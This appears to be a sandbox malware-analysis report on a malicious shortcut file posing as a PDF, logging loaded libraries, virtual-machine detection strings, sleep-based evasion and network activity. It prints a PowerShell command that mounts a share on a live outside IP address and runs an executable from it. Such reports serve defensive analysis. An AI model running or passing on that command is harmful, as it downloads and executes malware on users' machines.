Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "explorer '\\77.105.161.194@80\file\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\77.105.161.194@80\file\6706e721f2c06.exe

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Hooking and other Techniques for Hiding and Protection

barindex
Source: Possible double extension: pdf.lnkStatic PE information: #U0414#U043e#U043a#U0443#U043c#U0435#U043d#U0442#U0438.pdf.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5715Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4103Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 786Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 759Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4148Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8116Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: explorer.exe, 00000003.00000003.1825207679.000000000B907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:=>
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\N
Source: explorer.exe, 00000003.00000002.4133682292.00000000085C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000003.1725367782.0000000008617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000E
Source: explorer.exe, 00000002.00000002.1709940016.000000000127A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1770312521.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768583338.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1774936994.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1793770874.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1782359564.000000000887E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767560781.000000000887E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000002.4138843117.000000000B959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 00000003.00000003.1803683982.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.1767052707.000000000883D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00L
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e\
Source: explorer.exe, 00000003.00000002.4133682292.00000000085BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
Source: explorer.exe, 00000002.00000002.1709940016.00000000011F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: svchost.exe, 00000004.00000002.3388196191.00000284AAE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW zE
Source: explorer.exe, 00000003.00000002.4133682292.00000000085C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000003.3817790448.0000000008944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000005
Source: explorer.exe, 00000003.00000003.2973453870.000000000887E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000H
Source: explorer.exe, 00000003.00000003.1821511866.000000000B888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_0
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\3
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 00000003.00000003.1767052707.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
Source: explorer.exe, 00000003.00000003.1725367782.0000000008617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.2973453870.00000000088D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000003.00000003.1725367782.00000000085FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}dows_NTPath=C:\Program Fi@}
Source: explorer.exe, 00000003.00000003.1820943668.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}9507e
Source: explorer.exe, 00000003.00000003.1825207679.000000000B907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000003.00000003.2976404480.00000000085E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3819733930.00000000085E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133811243.00000000085E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\rdpbus.inf_locN%3
Source: explorer.exe, 00000003.00000003.1825207679.000000000B991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 00000003.00000003.1819559891.000000000BA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.1725367782.00000000085FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000003.00000003.1820943668.000000000B931000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTftVMWare
Source: explorer.exe, 00000003.00000003.2973453870.0000000008727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1767052707.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1775141662.0000000008789000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1771280620.0000000008798000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1769205502.0000000008798000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1768180926.00000000087BB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4134236679.0000000008727000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3817790448.0000000008727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPKc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exeNetwork Connect: 77.105.161.194 80Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" \\77.105.161.194@80\file\Jump to behavior
Source: explorer.exe, 00000003.00000002.4133228899.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4132522253.0000000004C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.4133228899.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130042009.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000003.00000003.1725707837.0000000004909000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1721900064.0000000004909000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2975792224.0000000004906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
